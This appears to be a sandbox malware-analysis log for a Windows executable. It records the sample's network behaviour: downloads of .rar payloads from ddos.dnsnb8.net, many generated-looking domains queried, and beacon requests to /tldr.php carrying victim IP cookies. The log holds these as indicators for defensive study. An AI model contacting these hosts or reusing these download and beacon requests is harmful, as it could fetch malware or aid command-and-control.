Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: slpsrgpsrhojifdij.ru
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: aiiaiafrzrueuedur.ru
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fiiauediehduefuge.ru
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.su
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: afeifieuuufufufuf.su
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.in
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.in
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: iuirshriuisruruuf.in
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: slpsrgpsrhojifdij.net
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: aiiaiafrzrueuedur.net
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: nousiieiffgogogoo.net
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eofihsishihiursgu.net
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.biz
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.biz
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: noeuaoenriusfiruu.biz
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.biz
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fuaiuebndieufeufu.com
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: afeifieuuufufufuf.com
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.com
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.bizCookie: btst=5c4753b361b1eb941ef57a8440589e30\|8.46.123.33\|1721913364\|1721913364\|0\|1\|0; snkz=8.46.123.33
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.bizCookie: btst=4fd2a6dbe45ae70787377705520077bb\|8.46.123.33\|1721913370\|1721913370\|0\|1\|0; snkz=8.46.123.33
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: noeuaoenriusfiruu.bizCookie: btst=d9572a018c7a18b1f9b47fbe62723bee\|8.46.123.33\|1721913373\|1721913373\|0\|1\|0; snkz=8.46.123.33
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.bizCookie: btst=439a750021572922cb918eec537366b2\|8.46.123.33\|1721913381\|1721913381\|0\|1\|0; snkz=8.46.123.33

Source: unknown	TCP traffic detected without corresponding DNS query: 92.63.197.48
Source: unknown	TCP traffic detected without corresponding DNS query: 92.63.197.48
Source: unknown	TCP traffic detected without corresponding DNS query: 92.63.197.48
Source: unknown	TCP traffic detected without corresponding DNS query: 92.63.197.48
Source: unknown	TCP traffic detected without corresponding DNS query: 92.63.197.48
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_00402DF9 memset,memset,memset,memset,memset,_snwprintf,ExpandEnvironmentStringsW,GetTickCount,srand,memset,rand,rand,_snwprintf,InternetOpenW,InternetOpenUrlW,CreateWindowExW,CreateFileW,LoadImageA,WriteFile,CloseHandle,_snwprintf,DeleteFileW,Sleep,CloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,memset,rand,rand,_snwprintf,URLDownloadToFileW,memset,_snwprintf,DeleteFileW,Sleep,ExitThread,

0_2_00402DF9

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnu.ru
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ww88.ssofhoseuegsgrfnu.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: 92.63.197.48
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: slpsrgpsrhojifdij.ru
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: aiiaiafrzrueuedur.ru
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fiiauediehduefuge.ru
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.su
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: afeifieuuufufufuf.su
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.in
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.in
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: iuirshriuisruruuf.in
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: slpsrgpsrhojifdij.net
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: aiiaiafrzrueuedur.net
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: nousiieiffgogogoo.net
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eofihsishihiursgu.net
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.biz
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.biz
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: noeuaoenriusfiruu.biz
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.biz
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fuaiuebndieufeufu.com
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: afeifieuuufufufuf.com
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.com
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.bizCookie: btst=5c4753b361b1eb941ef57a8440589e30\|8.46.123.33\|1721913364\|1721913364\|0\|1\|0; snkz=8.46.123.33
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.bizCookie: btst=4fd2a6dbe45ae70787377705520077bb\|8.46.123.33\|1721913370\|1721913370\|0\|1\|0; snkz=8.46.123.33
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: noeuaoenriusfiruu.bizCookie: btst=d9572a018c7a18b1f9b47fbe62723bee\|8.46.123.33\|1721913373\|1721913373\|0\|1\|0; snkz=8.46.123.33
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.bizCookie: btst=439a750021572922cb918eec537366b2\|8.46.123.33\|1721913381\|1721913381\|0\|1\|0; snkz=8.46.123.33

Source: global traffic	DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic	DNS traffic detected: DNS query: ssofhoseuegsgrfnu.ru
Source: global traffic	DNS traffic detected: DNS query: ww88.ssofhoseuegsgrfnu.ru
Source: global traffic	DNS traffic detected: DNS query: slpsrgpsrhojifdij.ru
Source: global traffic	DNS traffic detected: DNS query: aiiaiafrzrueuedur.ru
Source: global traffic	DNS traffic detected: DNS query: fuaiuebndieufeufu.ru
Source: global traffic	DNS traffic detected: DNS query: eiifngjfksisiufjf.ru
Source: global traffic	DNS traffic detected: DNS query: eoroooskfogihisrg.ru
Source: global traffic	DNS traffic detected: DNS query: noeuaoenriusfiruu.ru
Source: global traffic	DNS traffic detected: DNS query: iuirshriuisruruuf.ru
Source: global traffic	DNS traffic detected: DNS query: afeifieuuufufufuf.ru
Source: global traffic	DNS traffic detected: DNS query: srndndubsbsifurfd.ru
Source: global traffic	DNS traffic detected: DNS query: fiiauediehduefuge.ru
Source: global traffic	DNS traffic detected: DNS query: nousiieiffgogogoo.ru
Source: global traffic	DNS traffic detected: DNS query: fifiehsueuufidhfi.ru
Source: global traffic	DNS traffic detected: DNS query: eofihsishihiursgu.ru
Source: global traffic	DNS traffic detected: DNS query: nnososoosjfeuhueu.ru
Source: global traffic	DNS traffic detected: DNS query: ssofhoseuegsgrfnj.su
Source: global traffic	DNS traffic detected: DNS query: slpsrgpsrhojifdij.su
Source: global traffic	DNS traffic detected: DNS query: aiiaiafrzrueuedur.su
Source: global traffic	DNS traffic detected: DNS query: fuaiuebndieufeufu.su
Source: global traffic	DNS traffic detected: DNS query: eiifngjfksisiufjf.su
Source: global traffic	DNS traffic detected: DNS query: eoroooskfogihisrg.su
Source: global traffic	DNS traffic detected: DNS query: noeuaoenriusfiruu.su
Source: global traffic	DNS traffic detected: DNS query: iuirshriuisruruuf.su
Source: global traffic	DNS traffic detected: DNS query: afeifieuuufufufuf.su
Source: global traffic	DNS traffic detected: DNS query: srndndubsbsifurfd.su
Source: global traffic	DNS traffic detected: DNS query: fiiauediehduefuge.su
Source: global traffic	DNS traffic detected: DNS query: nousiieiffgogogoo.su
Source: global traffic	DNS traffic detected: DNS query: fifiehsueuufidhfi.su
Source: global traffic	DNS traffic detected: DNS query: eofihsishihiursgu.su
Source: global traffic	DNS traffic detected: DNS query: nnososoosjfeuhueu.su
Source: global traffic	DNS traffic detected: DNS query: ssofhoseuegsgrfnj.in
Source: global traffic	DNS traffic detected: DNS query: slpsrgpsrhojifdij.in
Source: global traffic	DNS traffic detected: DNS query: aiiaiafrzrueuedur.in
Source: global traffic	DNS traffic detected: DNS query: fuaiuebndieufeufu.in
Source: global traffic	DNS traffic detected: DNS query: eiifngjfksisiufjf.in
Source: global traffic	DNS traffic detected: DNS query: eoroooskfogihisrg.in
Source: global traffic	DNS traffic detected: DNS query: noeuaoenriusfiruu.in
Source: global traffic	DNS traffic detected: DNS query: iuirshriuisruruuf.in
Source: global traffic	DNS traffic detected: DNS query: afeifieuuufufufuf.in
Source: global traffic	DNS traffic detected: DNS query: srndndubsbsifurfd.in
Source: global traffic	DNS traffic detected: DNS query: fiiauediehduefuge.in
Source: global traffic	DNS traffic detected: DNS query: nousiieiffgogogoo.in
Source: global traffic	DNS traffic detected: DNS query: fifiehsueuufidhfi.in
Source: global traffic	DNS traffic detected: DNS query: eofihsishihiursgu.in
Source: global traffic	DNS traffic detected: DNS query: nnososoosjfeuhueu.in
Source: global traffic	DNS traffic detected: DNS query: ssofhoseuegsgrfnj.net
Source: global traffic	DNS traffic detected: DNS query: slpsrgpsrhojifdij.net
Source: global traffic	DNS traffic detected: DNS query: aiiaiafrzrueuedur.net
Source: global traffic	DNS traffic detected: DNS query: fuaiuebndieufeufu.net
Source: global traffic	DNS traffic detected: DNS query: eiifngjfksisiufjf.net
Source: global traffic	DNS traffic detected: DNS query: eoroooskfogihisrg.net
Source: global traffic	DNS traffic detected: DNS query: noeuaoenriusfiruu.net
Source: global traffic	DNS traffic detected: DNS query: iuirshriuisruruuf.net
Source: global traffic	DNS traffic detected: DNS query: afeifieuuufufufuf.net
Source: global traffic	DNS traffic detected: DNS query: srndndubsbsifurfd.net
Source: global traffic	DNS traffic detected: DNS query: fiiauediehduefuge.net
Source: global traffic	DNS traffic detected: DNS query: nousiieiffgogogoo.net
Source: global traffic	DNS traffic detected: DNS query: fifiehsueuufidhfi.net
Source: global traffic	DNS traffic detected: DNS query: eofihsishihiursgu.net
Source: global traffic	DNS traffic detected: DNS query: ssofhoseuegsgrfnj.biz
Source: global traffic	DNS traffic detected: DNS query: slpsrgpsrhojifdij.biz
Source: global traffic	DNS traffic detected: DNS query: aiiaiafrzrueuedur.biz
Source: global traffic	DNS traffic detected: DNS query: fuaiuebndieufeufu.biz
Source: global traffic	DNS traffic detected: DNS query: eiifngjfksisiufjf.biz
Source: global traffic	DNS traffic detected: DNS query: eoroooskfogihisrg.biz
Source: global traffic	DNS traffic detected: DNS query: noeuaoenriusfiruu.biz
Source: global traffic	DNS traffic detected: DNS query: iuirshriuisruruuf.biz
Source: global traffic	DNS traffic detected: DNS query: afeifieuuufufufuf.biz
Source: global traffic	DNS traffic detected: DNS query: srndndubsbsifurfd.biz
Source: global traffic	DNS traffic detected: DNS query: fiiauediehduefuge.biz
Source: global traffic	DNS traffic detected: DNS query: nousiieiffgogogoo.biz
Source: global traffic	DNS traffic detected: DNS query: fifiehsueuufidhfi.biz
Source: global traffic	DNS traffic detected: DNS query: eofihsishihiursgu.biz
Source: global traffic	DNS traffic detected: DNS query: nnososoosjfeuhueu.net
Source: global traffic	DNS traffic detected: DNS query: ssofhoseuegsgrfnj.com
Source: global traffic	DNS traffic detected: DNS query: slpsrgpsrhojifdij.com
Source: global traffic	DNS traffic detected: DNS query: aiiaiafrzrueuedur.com
Source: global traffic	DNS traffic detected: DNS query: fuaiuebndieufeufu.com
Source: global traffic	DNS traffic detected: DNS query: eiifngjfksisiufjf.com
Source: global traffic	DNS traffic detected: DNS query: eoroooskfogihisrg.com
Source: global traffic	DNS traffic detected: DNS query: noeuaoenriusfiruu.com
Source: global traffic	DNS traffic detected: DNS query: iuirshriuisruruuf.com
Source: global traffic	DNS traffic detected: DNS query: afeifieuuufufufuf.com
Source: global traffic	DNS traffic detected: DNS query: srndndubsbsifurfd.com
Source: global traffic	DNS traffic detected: DNS query: fiiauediehduefuge.com
Source: global traffic	DNS traffic detected: DNS query: nousiieiffgogogoo.com
Source: global traffic	DNS traffic detected: DNS query: fifiehsueuufidhfi.com
Source: global traffic	DNS traffic detected: DNS query: eofihsishihiursgu.com
Source: global traffic	DNS traffic detected: DNS query: nnososoosjfeuhueu.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 25 Jul 2024 13:15:22 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Jul 2024 13:15:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

